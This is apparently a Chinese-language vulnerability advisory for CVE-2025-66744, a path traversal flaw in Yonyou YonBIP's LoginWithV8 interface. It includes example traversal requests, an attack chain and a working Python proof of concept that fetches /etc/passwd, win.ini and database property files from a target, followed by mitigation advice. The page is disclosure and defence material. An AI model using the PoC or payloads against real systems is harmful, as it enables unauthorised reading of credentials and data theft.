CVE-2025-66744 - 用友YonBIP LoginWithV8接口路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-66744

漏洞类型

路径遍历

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

用友YonBIP v3及之前版本

漏洞概述

CVE-2025-66744是发生在用友网络科技股份有限公司（以下简称“用友”）开发的YonBIP（Yonyou Business Innovation Platform）3版本中的一个高危路径遍历漏洞。该漏洞存在于YonBIP的系列数据应用服务系统中的LoginWithV8接口，由于该接口对用户输入的路径参数缺乏充分的验证和过滤，攻击者可以利用“../”等目录遍历字符序列来访问系统中的任意文件，包括配置文件、源代码、数据库连接信息、日志文件以及其他敏感数据。此漏洞无需任何认证即可被利用，攻击复杂度低，影响范围广泛。由于用友YonBIP是企业级商业智能平台，通常部署在企业内部核心业务系统中，存储有大量商业机密数据和客户信息，一旦被攻击者利用，可能导致严重的数据泄露事件，对企业的信息安全和商业利益造成重大损害。

技术细节

该路径遍历漏洞存在于用友YonBIP v3的LoginWithV8接口中。漏洞的根本原因在于该接口在处理文件路径参数时，直接将用户可控的输入拼接到文件路径中，而没有对输入进行安全过滤或使用安全的文件访问API。攻击者可以通过构造特殊的HTTP请求，在路径参数中注入“../”等目录遍历字符，突破应用程序的目录限制，访问上层目录中的敏感文件。例如，攻击者可能通过构造类似“LoginWithV8?file=../../etc/passwd”或“LoginWithV8?path=../../webapps/admin/config.xml”的请求来读取系统配置文件、数据库凭证、API密钥等敏感信息。由于该接口无需认证即可访问，任何能够与YonBIP服务器建立网络连接的攻击者都可以利用此漏洞。在CVSS 3.1评分体系中，该漏洞的机密性影响被评为高（H），完整性和可用性影响为无（N），整体评分为7.5分，属于高危漏洞。攻击者利用此漏洞可以获取系统的敏感配置信息，进而可能进行更深层次的渗透攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站是否使用用友YonBIP系统，通常通过HTTP响应头、页面特征或已知技术指纹进行判断。

STEP 2

步骤2: 漏洞探测

攻击者尝试访问LoginWithV8接口，通过发送包含路径遍历字符的请求（如../）来测试是否存在路径遍历漏洞。

STEP 3

步骤3: 敏感文件读取

确认漏洞存在后，攻击者构造恶意的文件路径请求，尝试读取系统配置文件、数据库连接信息、日志文件等敏感数据。

STEP 4

步骤4: 数据分析利用

攻击者对获取的敏感信息进行分析，提取数据库凭证、API密钥、加密算法等关键数据，为进一步渗透攻击做准备。

STEP 5

步骤5: 横向移动或数据窃取

利用获取的凭证信息，攻击者可能进一步控制整个系统、窃取大量业务数据或破坏系统正常运行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-66744 PoC - Yonyou YonBIP LoginWithV8 Path Traversal
# Target: Yonyou YonBIP v3 and before

def exploit_path_traversal(target_url):
    """
    Exploit CVE-2025-66744: Path Traversal in LoginWithV8 interface
    """
    # Common sensitive files to check
    sensitive_files = [
        '../../../../windows/win.ini',
        '../../../../etc/passwd',
        '../../../webapps/ROOT/WEB-INF/classes/db.properties',
        '../../../config/database.yml',
        '../../../logs/application.log'
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-66744 - Path Traversal in LoginWithV8\n")
    
    for file_path in sensitive_files:
        try:
            # Construct the malicious URL
            exploit_url = f"{target_url}/LoginWithV8?file={file_path}"
            
            print(f"[*] Testing: {file_path}")
            
            response = requests.get(exploit_url, timeout=10, verify=False)
            
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[+] SUCCESS! Retrieved file content:")
                print(response.text[:500])
                print("-" * 50)
                return True
            else:
                print(f"[-] Failed (Status: {response.status_code})")
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Request error: {e}")
    
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-66744.py <target_url>")
        print("Example: python cve-2025-66744.py http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_path_traversal(target)

影响范围

用友YonBIP v3及之前所有版本

防御指南

临时缓解措施

在官方修复补丁发布之前，建议采取以下临时缓解措施：1）通过Web应用防火墙或负载均衡设备对LoginWithV8接口的访问进行限制，阻止包含路径遍历字符的请求；2）对该接口实施IP白名单访问控制，仅允许受信任的IP地址访问；3）暂时禁用或关闭LoginWithV8接口功能；4）加强对系统日志的监控，及时发现异常访问行为；5）对已知的敏感文件进行访问权限加固，限制应用程序用户对系统配置文件的读取权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66744
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66744
3 Details https://www.cvedetails.com/cve/CVE-2025-66744/
4 VulDB https://vuldb.com/cve/CVE-2025-66744
5 Link https://github.com/iSee857/YonYouBip-path-travel
6 Link https://github.com/iSee857/YonYouBip-path-travel